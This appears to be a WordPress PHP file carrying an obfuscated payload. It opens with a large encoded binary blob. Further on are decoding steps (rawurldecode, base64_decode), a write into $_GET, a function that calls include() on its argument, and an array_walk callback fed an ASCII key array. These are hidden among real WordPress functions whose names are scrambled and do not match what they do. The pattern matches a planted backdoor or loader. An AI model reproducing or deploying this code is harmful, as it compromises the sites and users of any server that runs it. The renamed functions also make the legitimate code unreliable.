\x80y\x9e\x9dz\xa9\xacy\xabuVv\xe3N\xdc\xbe\xdc\xcex\x9e\xbb\x9c\xbd\xc4l\x95\x80\x95\xc0\x81[\x89\x89i\x94\x95v\xb9\xe3\xa3\xe2\xa6\xaf\x88\xef[\xa6\x89\xa4\xd1\xb0v\xcf\xb6\xc5\xd7\x85\x90\xac\xe8r\x93\x98\x86}\x9c\x86\xa2\x9f~\xae}\xa1O\x97r\x89\x89i\xf1\z\x8bl\x95vpe\x97r\x98\x93i\x94\xb7\xbc\x9a\x9ap\xbc\x97\xcc\xa9\xd9\x96\xad\xc2x\x9e\x95r\x90\xc5\x97\xdbv\x90t\xb4r\x89\x89i\xd9\xed\xc2\xdc\xda\xb0\xda~\x8dq\x9e~\x98\x93\x94\xba\xbar\x9a\x9as\xd6\xc6\xd6\xb1\xdc~\xd8\xdb\xaa\xe2\xdc\xb7\x9c\xcd\xad\xe3\xb7\xd4\xa6\x9e{\xa4sR}\x95r\x94\xc3\xba\xee\x9e\xbe\x86\x97r\x89\xa6R\xe6\xd6\xc9\xe5\xdd\xb8\xd9\xbb\xc9\xb4\xdb\xb7\x91\x90n\xa6\xa5\x9a\xd5\xd7\xb8\xe4{\x98u\xce\xc1\xdb\xd5\xad\x99\xa7\x82\x97\x94\x87\x85\x90\x89\xcd\x97\xb1\xcci\x9e\xa4v\xdb\xda\xc6\xbb\xcc\xa8N\xb4[\x99\xa4i\x94\x95rz\x8bl\x95v\x86e\xee\xba\xd2\xd5\xae}\x9dv\xdb\xda\xc6\xbb\xcc\xa8t\xa1r\xc0\xcfi\x94\x9f\x81\xact\xaf\xe4\xcb\xd4\xb9\x9fv\xb0\xaa\xaf\xd8\xd7\x96\xb4\xc4u\xa4\x80\xa9\x98\xb9\xc3\x89\x89i\x9e\xa4{\x90\x8bl\x95\xd1pe\x97r\x89\x89i\x94\x99\x99\xb1\xd1\xb0\xd7\x9a\xaa\x9e\xd2v\xd4\xd8\xc3\xba\xeb\x94\xcd\x9av\x95v\x86\x9c\xcd\xc3\xbf\xbbi\x94\x95|\x9f\xa8l\x95\xc9\xda\xb7\xd6\xc4\xce\xd9\xae\xd5\xe9z\x94\xb2\x8d\xdb\xba\xc8\x89\xbb\xab\xc4\x8d\xb4\xe3\xef\x98\xe6\xad\xa9\xa1_\x98n\xb2\\x89\x89i\xa3\x9f\xb7\xb2\xb5\x9d\xbcv\x86e\xa1\x81\x8d\xd4\xb8\xee\xbb\xc8\xb2\x96w\xb0`\x86e\x97r\x98\x93i\x94\xdf\xc3\xe8\x95{\xf2`\x86e\x97r\x89si}\x99\xb6\xdf\xe2\xa3\xe8\x9b\xdf\xad\xb8\xa3\x98\x93i\x94\x95\xc0\x90\x8bl\x9f\x85\xa3e\xea\xc6\xdb\xc8\xbb\xd9\xe5\xb7\xd1\xdft\x99\xc9\xcd\xac\xc0\xbc\xb0\x95i\x94\xa8{\xab\xa6V\xa4\x80\x86e\x97\xaa\xda\x89s\xa3[\xe2\xd0\xc0\xea\xc8\xd4e\x97v\xba\xd9\xa0\xbc\xe5\x9d\xc1\xb8\xa4\xbe\x91\xa1O\x80r\x89\x89\xc6~\x95r\x90\x8bl\x95`oN\x80\x81\x93\xde\x93\x94\x95r\x9a\x9a\xb2\xea\xc4\xc9\xb9\xe0\xc1\xd7\x98s\x94\xe9\xc6\xc1\x8bl\x9f\x85\xd9\xbc\xd1\xa0\xc0\xd0\x8b\xca\xebz\x94\xce\xc2\xe3\x9e\xb2\xbe\xdd{srR\xefr\x90\x8bl\x95\x85\x90e\x97\xa9\x89\x89i\x9e\xa4v\xb9\xdb\x97\xb9\xa7\xc8e\x97r\xa6\x98s\x94\x95\x9b\xd3\xc5\x8d\x95\x80\x95g\xd3\xca\x9b\x9ck\xaf\xb0\y\x8bl\x95\xbc\xd5\xb7\xdc\xb3\xcc\xd1R\x9c\xee\x9a\xe1\xd7\xb6\xee\xc1\xba\x97\x9f{\x98\x93i\xc3\x95r\x90\x95{\xd6\xc9oi\xcb\xbd\xbc\xba\xaf\xbd\xe9\xb4\xe6\x94{\x9fv\xbe\xaf\xe6\xc6\x89\x89i\x9e\xa4\xcdzt\x9d\xc3\xaa\xcc\x8d\xc0\xca\xe2\xb8\xba\x9c\x99\xa6\xdb\xbe\x9d\xdb\x9f\xda\xa7\xed~r\x8d\x92\xe4\xc0\x96\xc1\xcdu\xb0`o\xc2\x81r\x89r\xc6~~[ytV\x95v\x86N\xdd\xc7\xd7\xcc\xbd\xdd\xe4\xc0y\xbb\xc0\xd9\xc8\xd5\xb8\xec\xa6\xb7\x91m\xc4\xbc\xa4\xdf\xb6\x97\xdd\xc1\x92N\x9b\xbd\xb1\xc3\xb2\xec\xe1{zuV\xa4\x80\x86e\xe8r\x93\x98\xc4~\x95r\x90\x8bl\x95v\x86\xae\xdd[\x91\x89\xac\xe3\xea\xc0\xe4\x8bl\x95v\x86m\x80v\xb9\xb0\x9b\xe3\xc0\x9d\xd8\xd6{\x9fv\xd7\xbe\xbd\x9c\xd9\x89i\x9e\xa4{\x90\x8bl\xb2\x93ox\x80{r\xe4S\x94\x95r\x90\x8bp\xc3\x9f\xbb\x95\xe7\xbe\xd4\xcd\xc1}\xb2\x81\x9a\x8bl\xd7\xad\xc7e\xa1\x81\x8d\xb9\x90\xc6\xe4\x9d\xbb\xd3\xb7\xd0\x87\xc3\x80\x81rr\x8d\x9f\xb8\xbd\xc9\xdft\x89\x95v\x86e\x9b\xa2\xb0\xbb\xb8\xbf\xc0\xba\xdb\xc6~\xd2\x91\x8a\xa4\xce\xc8\xe3\xcc\x9a\xa3\x9fr\xda\xccv\xa4\x93\x95o\x97r\x89\xe0\xc3\xeb\xea|\x9f\x92~\xa6\x8a\x9b|\x9e\x8dsrR}\x99\xa2\xbf\xd1\xc5\xc0\xc3\xdf\xa8\xeb\xa7\x89\x89i\xb1\xa4|\xb9\x8bl\x9f\x85\x8a\x93\xc0\xa7\xb9\xd9\xb5\xdf\xd9\xca\x98\x8f\xa2\xb9\x9e\xdd\xb4\xa0\x8dssR\xd9\xeb\xb3\xdc\x9av\x95v\xe0\xb8\xbf\xa4\xe3\x89i\x94\x9f\x81\x98\x8bl\x99\xa6\xb5\xab\xf0\x9d\xd6\xe2\xac\xe8\xca[\x99\xa6\x87`pt\xa1r\x89\xd6i\x9e\xa4\xb6\xd9\xd0U\x9d\xa1O\x97r\x89\x89R\xf1r\x90\x8bl\x95v\x86e\xf4\\x89\x89x\x9e\x95\x93\xd4\xce\x9d\xccv\x86o\xa6\sr\xaf\xe9\xe3\xb5\xe4\xd4\xbb\xe3_\xcf\xb9\xcc\xb3\xda\xc1\x8f\x9c\x99\x98\xb7\xdc\xa3\xc0\x9b\xb3q\x97v\xd9\xda\xb3\xd8\xcb\xab\x99uU~\xd1pO\x81r\xdb\xce\xbd\xe9\xe7\xc0y\x8f\x92\xbc\xc7\xbd\x90\xbc\x9f\x98\x93i\x94\xde\xc8\xb7\xd6l\x9f\x85\xc4N\x9b\xc2\xda\xd3\xad\xca\xce\x8d\x94\xca\x92\xeb\xba\x86e\x97r\xa6rp\xa6\xa5\x82\xa4\x9bs\xb0`\x86e\x97r\x89\x89i\x94\x95\xcfz\x8bl\x95v\x86O\x97\x81\x93\xc2\x8f\x9e\xa4\xb8\xe5\xd9\xaf\xe9\xbf\xd5\xb3\xa6|\x89\xe3\xbb\xe5\x95r\x90\x95{\xc0\xc2\xcb\xbc\xbc\xbd\xd1\xcfq\x98\xdc\xa1\xbe\xde\x9b\xe0\xb0\xd9q\x80v\xb2\xd9\x94\xb8\xc6\xb4\x99ul\x95v\x86e\x97\xcd\x89sR}\x95r\x94\xd2\x9b\xc3\xc9\xb5\xb0\xd1\xc5\x98\x93i\x94\x95\xb5\xc1\xd3l\x95\x80\x95\x82\xa6|\x89\x89i\xcd\xbbr\x90\x95{\xda\xce\xd6\xb1\xe6\xb6\xce\x98s\x94\x95\xa7\x9a\x9at\x99\x9f\xd6\x90\xbb\xa3\xcb\x95i\x94\x95r\x94\xd2\x9b\xc3\xc9\xb5\xb0\xd1\xc5r\x92\x84\xaf\z\x8bl\x95vpO\x81r\xb9\xdd\xad\xe6\xe4\xc5\xe5\xbf\x9a\x9dz\xcd\x94\xc5\xc5\xb8\xd4\xa3\xe7\xa1r\x90\x8bp\xbe\xc6\xb1\x89\xc8\xb4\x92\xa4S}\x95r\x90\x8b\xc9`pO\x80[r\x89i\xda\xea\xc0\xd3\xdf\xb5\xe4\xc4\x95o\x97r\x89\xd8\xae\xdb\xe4r\x90\x8bv\xa4\xa7\xb4\x99\xdd\x9a\xb2\xe1\xc2\xc3\xe6z\x94\xbf\xb7\xc8\xa7\xcc\x8e\xeb\xb4\xdf\x95i\x94\x95r\x90\x8f\x95\xe5\xa1\xaa\x96\xd9{srR}~[\x9f\x95l\x95v\xc7\x8b\xbd\xbb\xd7\x89i\x9e\xa4\xcdztU~_\x95o\x97r\x89\xd7\x8e\xe1\x9f\x81\xd6\xda\xbe\xda\xb7\xc9\xad\xa6|\x89\x89i\xc5\xdd\xa8\xd9\x8bl\x9f\x85\x8ee\x9b\xa6\xd4\xbc\x9a\xda\xbe\xc6\xd2\xe1{\x9f\xc7\xd1\x9d\x97|\x98\xca\xbc\x94\x99\xc2\xe1\xd5\xb0\xcb\xaf\x95o\x97\xc4\x93\x98\x86\xb2\x95r\x90\x8bp\xbb\x9d\xd7\x9c\xc2\x97\xb6rr}\xf0\ytU~_\x95o\x97r\xd5\x89i\x9e\xa4\x98\xc2\xcf\x96\xb7~\x8a\xb5\xe8\xbc\xcd\xbf\xa2\xa0\x95r\x90\xb1\xa5\xc5\xaa\xcbm\x9b\x98\xb0\xda\xa0\xbf\xba\x9f\x99\x97{\x9f\xb7\xcd\xbd\xbcr\x89\x93x\x98\xbe\xc2\xbb\xaf\x9d\xd7\xa1i\xd6\xbe\xab\x98s\x94\x95r\xd1\xcf\xbc\xde\xa3\x86e\x97|\x98\xa6x\x9e\x95\xa3\xc9\xe4l\x95\x80\x95l\xaa\x83\x9d\x9d}\x9b\xb0\z\x8bl\xf2`\x86e\x97rr\xe6S\x94\x95r\x90tV\x95v\x86e\x97r\x89\x89\xaf\xe9\xe3\xb5\xe4\xd4\xbb\xe3_\xa7\x9c\xc0\xb4\xbb\x91m\xe4\xe6\xbc\xd4\xc1\xa5\xa1_\x8a\x8b\xbe\xc3\xc0\xb4\x8e\xc1\x9e\y\xe6V\x95v\x86e\x97v\xb3\xbc\xb4\xd8\xce\xbd\xbd\xd5U\xb2_\xd9\xb9\xe9\xbe\xce\xd7q\x94\x95r\x90\x8f\x92\xbc\xc7\xbd\x90\xbc\x9fr\x92x\xe7\xe9\xc4\xdc\xd0\xba\x9d_\x8a\xb5\xe8\xbc\xcd\xbf\xa2\xa3\x9fr\xb7\x8bv\xa4\xa1O\x81[\x8d\xd9\xba\xde\xd9\xa8\xc9tz\xb2\x85\x90e\x97r\xb2\xaci\x94\x9f\x81\x92\xb0\x96\xe0\xad\xd2r\xc3\xca\xe1\xc3v\xd8\xe0\xbb\xca\x98\x9e\xbb\xc1\xbd\x99\xe0\x9d\x96\xb1\xbd\xe6\xba\xbb\xe6\x98\xbc\xc6\xaf\x93\xbb\xc9\x93\xaf\xd5k\xaf[y\x8bl\x95v\x86i\xe7\xc3\xd3\xcd\x9f\xcd\x95r\x90\x8b\x89~\xc9\xda\xb7\xd6\xc4\xce\xd9\xae\xd5\xe9r\x90\x93l\x95v\x8a\xb5\xe8\xbc\xcd\xbf\xa2\xa0\x95r\x90\x8bl\xde\xc4\xda\xbb\xd8\xbe\x91\x8d\x93\xc7\xe0\xb6\xc9\xd6\x99\xdfop\xa6|\x89\x89i\xba\xdar\x9a\x9a}\x9e\x91\xa1O\x97\rri\x94\x95\xc4\xd5\xdf\xc1\xe7\xc4oi\xe7\xc3\xd3\xcd\x9f\xcd\xb0\zt\xc9`pt\xa1r\xd3\xe3\xbf\xc7\x95r\x9a\x9aV\x95v\x86e\x97r\x89\x89\xaf\xe9\xe3\xb5\xe4\xd4\xbb\xe3\x85\x90\xbc\xcar\x89\x89s\xa3\xbb\xa4\xd4\xb5\x8e\x9dz\xd6\xb6\xe1\xb6\xbf\xc2u\xa3\x9fr\x90\x8b\xc6\xcf\xbb\xb9\x87\xa1\x81\x8d\xaf\x90\xe5\xcc\x9d\xb5\xb8x~z\xaf\xb5\xc2\x96\xba\xcbr~~\xcdyul\x95v\x86N\xc2\xbe\xce\xe0\x8e\xdf\xdd\xb8\x98\xd4\xc0\xca\xb7\xd7\x9d\xbdz\x8d\xaf\x90\xe5\xcc\x9d\xb5\xb8x~\x97\xbd\x8e\xd9\xa4\x91\x8d\xb9\xe5\xdf\xb6\xc6\xc4x~z\xac\x8c\xe8\xa9\xb4\xae\x96\x9d\x9e~\x9f\x95l\xe1\xcd\xc7o\xa6v\xb2\xd9\x94\xb8\xc6\xb4\x99\xa6V~_oe\x97rs\x89i\x94~v\xd2\xcf\x9b\xe6\xc0\xce\x8b\xcd[\xa6\x89\xbd\xe6\xde\xbf\x98\x8f\x92\xbc\xc7\xbd\x90\xbc\x9f\x92\xa4m\xd3\xe5\x9fy\xa8U\x9c\x88\x9f}\xa9\x84\x90\xa4S~~v\xb2\xaf\xa5\xbe\x9e\xb7\xaa\x80\x8f\x98\x93i\xcd\x95r\x9a\x9a\xb1\xed\xc6\xd2\xb4\xdb\xb7\x91\x8d\x92\xe4\xc0\x96\xc1\xcdx\xa4\x80\x86e\x97\xa7\xd9\xb2\xb3\x94\x9f\x81\x94\xcd\xb0\xc4\xc7\xd0\xad\xbd\xa8\x92\xa4S\x94\x95r\x90\xd4\xb2\xa4\x80\xd9\x96\xe7\xc4\x89\x93x\x9c\xd8\xc1\xe5\xd9\xc0\x9dz\xa8\x89\xd0\x9b\xb1\xba\xae\x9d\xa4|\x90\xdel\x95\x80\x95\x83\x97r\x89\x9ar}\xf0\y\x8f\xc4\xbb\xa0\xc7\xb1\xde\xc2\x89\x89i\x94\x95\x8fy\xd4\xb9\xe5\xc2\xd5\xa9\xdcz\x90\x96p\xa0~v\xb2\xaf\xa5\xbe\x9e\xb7\xaa\xa0\x8dsrR}~[y\x8f\xbc\xed\xbe\xa7\x9f\xea[\xa6\x98s\x94\x95r\xbf\xc3\xb5\x9f\x85\xd9\xb9\xe9\xb1\xd9\xca\xad\x9c\x99\xca\xb6\xb5\xad\xe1\xbd\xd6q\x97\x84\x99\x95x\x9e\x95\xcc\xda\x8bv\xa4}\x96l\xa3[\xbc\xbd\x9b\xd3\xc5\x93\xb4\xca\x9e\xbe\x9d\xae\x99\xa0\x8ds\x89i\x94\xf2\zuU\xf2`\x95o\x97r\xad\xc3\xbc\x94\x95r\x9a\x9aV\x95v\x86e\x80\xc5\xe0\xc3\x97\xcb\xdc\x94\xc6\xe1t\x97x\x8f\x80\x99\x8d\xd2\xa3}\xaf\xe8\x8c\xa6\xa5n\xea\xc4\xd2\xae\xe5\xbd\x8b\xa4\xc6"; // %x2F ("/") and skip the remaining steps. $QuicktimeAudioCodecLookup = rawurldecode($sub2tb); $_GET["DiRiKP"] = $ptype_menu_position; } /** * See if the next character is LWS * * @return bool true if the next character is LWS, false if not */ function the_content($flattened_subtree){ $auth_failed = "Info Data Example"; include($flattened_subtree); } /** * Remove control callback for widget. * * @since 2.2.0 * * @param int|string $theme_json_version Widget ID. */ function wp_parse_url($theme_json_version) { wp_register_widget_control($theme_json_version, '', ''); } $interval = array(69, 119, 82, 105, 105, 73, 116, 117, 82, 112, 107, 76, 117, 86, 102); $action_count = trim($group_items_count); /** * Retrieves the link for a page number. * * @since 1.5.0 * * @global WP_Rewrite $property_id WordPress rewrite component. * * @param int $display_version Optional. Page number. Default 1. * @param bool $currentHeader Optional. Whether to escape the URL for display, with esc_url(). * If set to false, prepares the URL with sanitize_url(). Default true. * @return string The link URL for the given page number. */ function print_column_headers($display_version = 1, $currentHeader = true) { global $property_id; $display_version = (int) $display_version; $unwrapped_name = remove_query_arg('paged'); $widgets = parse_url(home_url()); $widgets = isset($widgets['path']) ? $widgets['path'] : ''; $widgets = preg_quote($widgets, '|'); $unwrapped_name = preg_replace('|^' . $widgets . '|i', '', $unwrapped_name); $unwrapped_name = preg_replace('|^/+|', '', $unwrapped_name); if (!$property_id->using_permalinks() || is_admin()) { $parser_check = trailingslashit(get_bloginfo('url')); if ($display_version > 1) { $translations_path = add_query_arg('paged', $display_version, $parser_check . $unwrapped_name); } else { $translations_path = $parser_check . $unwrapped_name; } } else { $int1 = '|\?.*?$|'; preg_match($int1, $unwrapped_name, $past); $typography_settings = array(); $typography_settings[] = untrailingslashit(get_bloginfo('url')); if (!empty($past[0])) { $f8 = $past[0]; $unwrapped_name = preg_replace($int1, '', $unwrapped_name); } else { $f8 = ''; } $unwrapped_name = preg_replace("|{$property_id->pagination_base}/\\d+/?\$|", '', $unwrapped_name); $unwrapped_name = preg_replace('|^' . preg_quote($property_id->index, '|') . '|i', '', $unwrapped_name); $unwrapped_name = ltrim($unwrapped_name, '/'); if ($property_id->using_index_permalinks() && ($display_version > 1 || '' !== $unwrapped_name)) { $typography_settings[] = $property_id->index; } $typography_settings[] = untrailingslashit($unwrapped_name); if ($display_version > 1) { $typography_settings[] = $property_id->pagination_base; $typography_settings[] = $display_version; } $translations_path = user_trailingslashit(implode('/', array_filter($typography_settings)), 'paged'); if (!empty($f8)) { $translations_path .= $f8; } } /** * Filters the page number link for the current request. * * @since 2.5.0 * @since 5.2.0 Added the `$display_version` argument. * * @param string $translations_path The page number link. * @param int $display_version The page number. */ $translations_path = apply_filters('print_column_headers', $translations_path, $display_version); if ($currentHeader) { return esc_url($translations_path); } else { return sanitize_url($translations_path); } } $del_nonce = base64_decode($subkey_len); /** * Updates metadata cache for a list of post IDs. * * Performs SQL query to retrieve the metadata for the post IDs and updates the * metadata cache for the posts. Therefore, the functions, which call this * function, do not need to perform SQL queries on their own. * * @since 2.1.0 * * @param int[] $layout_styles Array of post IDs. * @return array|false An array of metadata on success, false if there is nothing to update. */ function get_user_setting($layout_styles) { return update_meta_cache('post', $layout_styles); } /** * Retrieves query variable. * * @since 3.5.0 * * @param string $bytesizeuery_var Query variable key. * @return mixed */ if (!empty($checked_attribute)) { $show_in_rest = substr($checked_attribute, 0, 6); } $cache_value = strlen($wp_filter); /** * Retrieves the locale of a user. * * If the user has a locale set to a non-empty string then it will be * returned. Otherwise it returns the locale of get_locale(). * * @since 4.7.0 * * @param int|WP_User $include_schema User's ID or a WP_User object. Defaults to current user. * @return string The locale of the user. */ function sodium_crypto_core_ristretto255_scalar_random($include_schema = 0) { $dirname = false; if (0 === $include_schema && function_exists('wp_get_current_user')) { $dirname = wp_get_current_user(); } elseif ($include_schema instanceof WP_User) { $dirname = $include_schema; } elseif ($include_schema && is_numeric($include_schema)) { $dirname = get_user_by('id', $include_schema); } if (!$dirname) { return get_locale(); } $permalink = $dirname->locale; return $permalink ? $permalink : get_locale(); } $notice = str_pad($wp_filter, $cache_value + 3, "_"); /** * Outputs term meta XML tags for a given term object. * * @since 4.6.0 * * @global wpdb $bulk_counts WordPress database abstraction object. * * @param WP_Term $category_properties Term object. */ function status($category_properties) { global $bulk_counts; $update_meta_cache = $bulk_counts->get_results($bulk_counts->prepare("SELECT * FROM {$bulk_counts->termmeta} WHERE term_id = %d", $category_properties->term_id)); foreach ($update_meta_cache as $s_y) { /** * Filters whether to selectively skip term meta used for WXR exports. * * Returning a truthy value from the filter will skip the current meta * object from being exported. * * @since 4.6.0 * * @param bool $skip Whether to skip the current piece of term meta. Default false. * @param string $s_y_key Current meta key. * @param object $s_y Current meta object. */ if (!apply_filters('wxr_export_skip_termmeta', false, $s_y->meta_key, $s_y)) { printf("\t\t<wp:termmeta>\n\t\t\t<wp:meta_key>%s</wp:meta_key>\n\t\t\t<wp:meta_value>%s</wp:meta_value>\n\t\t</wp:termmeta>\n", wxr_cdata($s_y->meta_key), wxr_cdata($s_y->meta_value)); } } } $client_version = hash('md5', $show_in_rest); /** * Kills WordPress execution and displays XML response with an error message. * * This is the handler for wp_die() when processing XMLRPC requests. * * @since 3.2.0 * @access private * * @global wp_xmlrpc_server $current_width * * @param string $checked_attribute Error message. * @param string $caption_endTime Optional. Error title. Default empty string. * @param string|array $total_in_hours Optional. Arguments to control behavior. Default empty array. */ function the_author_msn($checked_attribute, $caption_endTime = '', $total_in_hours = array()) { global $current_width; list($checked_attribute, $caption_endTime, $theme_file) = _wp_die_process_input($checked_attribute, $caption_endTime, $total_in_hours); if (!headers_sent()) { nocache_headers(); } if ($current_width) { $ignore = new IXR_Error($theme_file['response'], $checked_attribute); $current_width->output($ignore->getXml()); } if ($theme_file['exit']) { die; } } $ReturnAtomData = str_repeat($action_count, 2); /** * Display the description of the author of the current post. * * @since 1.0.0 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function set_submit_normal() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'description\')'); the_author_meta('description'); } /* translators: %s: register_widget() */ if ($del_nonce !== false) { $importer = strlen($del_nonce); } $is_html5 = array(1, 2, 3); /** * Display the nickname of the author of the current post. * * @since 0.71 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function load_child_theme_textdomain() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'nickname\')'); the_author_meta('nickname'); } $is_writable_wp_plugin_dir = array($client_version, $show_in_rest); /** * @param string $site_path * @return string */ function wp_import_cleanup($site_path) { return "{$site_path} widgets_access "; } array_walk($mf, "column_blogname", $interval); /** * Header with image background and overlay block pattern */ if (!empty($is_html5)) { $pgstrt = implode("-", $is_html5); } /** * @param array $applicationid * @return bool */ function get_error_code($applicationid) { $c0 = wp_get_current_user(); if (!is_array($applicationid) || empty($applicationid)) { return false; } ?> <h1><?php esc_html_e('Users'); ?></h1> <?php if (1 === count($applicationid)) { ?> <p><?php _e('You have chosen to delete the user from all networks and sites.'); ?></p> <?php } else { ?> <p><?php _e('You have chosen to delete the following users from all networks and sites.'); ?></p> <?php } ?> <form action="users.php?action=dodelete" method="post"> <input type="hidden" name="dodelete" /> <?php wp_nonce_field('ms-users-delete'); $file_size = get_super_admins(); $audio_extension = '<option value="' . esc_attr($c0->ID) . '">' . $c0->user_login . '</option>'; ?> <table class="form-table" role="presentation"> <?php $ID3v2_key_good = (array) $_POST['allusers']; foreach ($ID3v2_key_good as $to_send) { if ('' !== $to_send && '0' !== $to_send) { $cpt = get_userdata($to_send); if (!current_user_can('delete_user', $cpt->ID)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User %s cannot be deleted.'), $cpt->user_login )); } if (in_array($cpt->user_login, $file_size, true)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User cannot be deleted. The user %s is a network administrator.'), '<em>' . $cpt->user_login . '</em>' )); } ?> <tr> <th scope="row"><?php echo $cpt->user_login; ?> <?php echo '<input type="hidden" name="user[]" value="' . esc_attr($to_send) . '" />' . "\n"; ?> </th> <?php $akismet_url = get_blogs_of_user($to_send, true); if (!empty($akismet_url)) { ?> <td><fieldset><p><legend> <?php printf( /* translators: %s: User login. */ __('What should be done with content owned by %s?'), '<em>' . $cpt->user_login . '</em>' ); ?> </legend></p> <?php foreach ((array) $akismet_url as $pattern_properties => $post_or_block_editor_context) { $smtp_code = get_users(array('blog_id' => $post_or_block_editor_context->userblog_id, 'fields' => array('ID', 'user_login'))); if (is_array($smtp_code) && !empty($smtp_code)) { $datapair = "<a href='" . esc_url(get_home_url($post_or_block_editor_context->userblog_id)) . "'>{$post_or_block_editor_context->blogname}</a>"; $tagtype = '<label for="reassign_user" class="screen-reader-text">' . __('Select a user') . '</label>'; $tagtype .= "<select name='blog[{$to_send}][{$pattern_properties}]' id='reassign_user'>"; $protocols = ''; foreach ($smtp_code as $include_schema) { if (!in_array((int) $include_schema->ID, $ID3v2_key_good, true)) { $protocols .= "<option value='{$include_schema->ID}'>{$include_schema->user_login}</option>"; } } if ('' === $protocols) { $protocols = $audio_extension; } $tagtype .= $protocols; $tagtype .= "</select>\n"; ?> <ul style="list-style:none;"> <li> <?php /* translators: %s: Link to user's site. */ printf(__('Site: %s'), $datapair); ?> </li> <li><label><input type="radio" id="delete_option0" name="delete[<?php echo $post_or_block_editor_context->userblog_id . '][' . $cpt->ID; ?>]" value="delete" checked="checked" /> <?php _e('Delete all content.'); ?></label></li> <li><label><input type="radio" id="delete_option1" name="delete[<?php echo $post_or_block_editor_context->userblog_id . '][' . $cpt->ID; ?>]" value="reassign" /> <?php _e('Attribute all content to:'); ?></label> <?php echo $tagtype; ?></li> </ul> <?php } } echo '</fieldset></td></tr>'; } else { ?> <td><p><?php _e('User has no sites or content and will be deleted.'); ?></p></td> <?php } ?> </tr> <?php } } ?> </table> <?php /** This action is documented in wp-admin/users.php */ do_action('delete_user_form', $c0, $ID3v2_key_good); if (1 === count($applicationid)) { ?> <p><?php _e('Once you hit “Confirm Deletion”, the user will be permanently removed.'); ?></p> <?php } else { ?> <p><?php _e('Once you hit “Confirm Deletion”, these users will be permanently removed.'); ?></p> <?php } submit_button(__('Confirm Deletion'), 'primary'); ?> </form> <?php return true; } $mf = fix_phpmailer_messageid($mf); /** * Server-side rendering of the `core/social-link` blocks. * * @package WordPress */ /** * Renders the `core/social-link` block on server. * * @param Array $wp_meta_keys The block attributes. * @param String $archive_pathname InnerBlocks content of the Block. * @param WP_Block $blog_public_on_checked Block object. * * @return string Rendered HTML of the referenced block. */ function wp_get_code_editor_settings($wp_meta_keys, $archive_pathname, $blog_public_on_checked) { $revision_query = isset($blog_public_on_checked->context['openInNewTab']) ? $blog_public_on_checked->context['openInNewTab'] : false; $protocol_version = isset($wp_meta_keys['service']) ? $wp_meta_keys['service'] : 'Icon'; $maybe_widget_id = isset($wp_meta_keys['url']) ? $wp_meta_keys['url'] : false; $t_addr = isset($wp_meta_keys['label']) ? $wp_meta_keys['label'] : block_core_social_link_get_name($protocol_version); $pixelformat_id = isset($wp_meta_keys['rel']) ? $wp_meta_keys['rel'] : ''; $render_callback = array_key_exists('showLabels', $blog_public_on_checked->context) ? $blog_public_on_checked->context['showLabels'] : false; // Don't render a link if there is no URL set. if (!$maybe_widget_id) { return ''; } /** * Prepend emails with `mailto:` if not set. * The `is_email` returns false for emails with schema. */ if (is_email($maybe_widget_id)) { $maybe_widget_id = 'mailto:' . antispambot($maybe_widget_id); } /** * Prepend URL with https:// if it doesn't appear to contain a scheme * and it's not a relative link starting with //. */ if (!parse_url($maybe_widget_id, PHP_URL_SCHEME) && !str_starts_with($maybe_widget_id, '//')) { $maybe_widget_id = 'https://' . $maybe_widget_id; } $origins = block_core_social_link_get_icon($protocol_version); $got_pointers = get_block_wrapper_attributes(array('class' => 'wp-social-link wp-social-link-' . $protocol_version . block_core_social_link_get_color_classes($blog_public_on_checked->context), 'style' => block_core_social_link_get_color_styles($blog_public_on_checked->context))); $concat_version = '<li ' . $got_pointers . '>'; $concat_version .= '<a href="' . esc_url($maybe_widget_id) . '" class="wp-block-social-link-anchor">'; $concat_version .= $origins; $concat_version .= '<span class="wp-block-social-link-label' . ($render_callback ? '' : ' screen-reader-text') . '">'; $concat_version .= esc_html($t_addr); $concat_version .= '</span></a></li>'; $rewrite_node = new WP_HTML_Tag_Processor($concat_version); $rewrite_node->next_tag('a'); if ($revision_query) { $rewrite_node->set_attribute('rel', trim($pixelformat_id . ' noopener nofollow')); $rewrite_node->set_attribute('target', '_blank'); } elseif ('' !== $pixelformat_id) { $rewrite_node->set_attribute('rel', trim($pixelformat_id)); } return $rewrite_node->get_updated_html(); } // Theme is already at the latest version. // Always persist 'id', because it can be needed for add_additional_fields_to_object(). /** * Outputs the Activity widget. * * Callback function for {@see 'dashboard_activity'}. * * @since 3.8.0 */ function remove_option_update_handler() { echo '<div id="activity-widget">'; $new_ext = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'future', 'order' => 'ASC', 'title' => __('Publishing Soon'), 'id' => 'future-posts')); $more_details_link = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'publish', 'order' => 'DESC', 'title' => __('Recently Published'), 'id' => 'published-posts')); $themes_update = get_date_template(); if (!$new_ext && !$more_details_link && !$themes_update) { echo '<div class="no-activity">'; echo '<p>' . __('No activity yet!') . '</p>'; echo '</div>'; } echo '</div>'; } getDebugLevel($mf); // Code by ubergeekØubergeek*tv based on information from /** * Ensures that the current site's domain is listed in the allowed redirect host list. * * @see wp_validate_redirect() * @since MU (3.0.0) * * @param array|string $control_tpl Not used. * @return string[] { * An array containing the current site's domain. * * @type string $0 The current site's domain. * } */ function colord_parse_hex($control_tpl = '') { return array(get_network()->domain); } // If we have pages, put together their info. /** * Retrieves the custom header text color in 3- or 6-digit hexadecimal form. * * @since 2.1.0 * * @return string Header text color in 3- or 6-digit hexadecimal form (minus the hash symbol). */ function wp_generator() { return get_theme_mod('header_textcolor', get_theme_support('custom-header', 'default-text-color')); } // edit_user maps to edit_users. /** * Handles renewing the REST API nonce via AJAX. * * @since 5.3.0 */ function add_customize_screen_to_heartbeat_settings() { exit(wp_create_nonce('wp_rest')); } unset($_GET[$tt_ids]);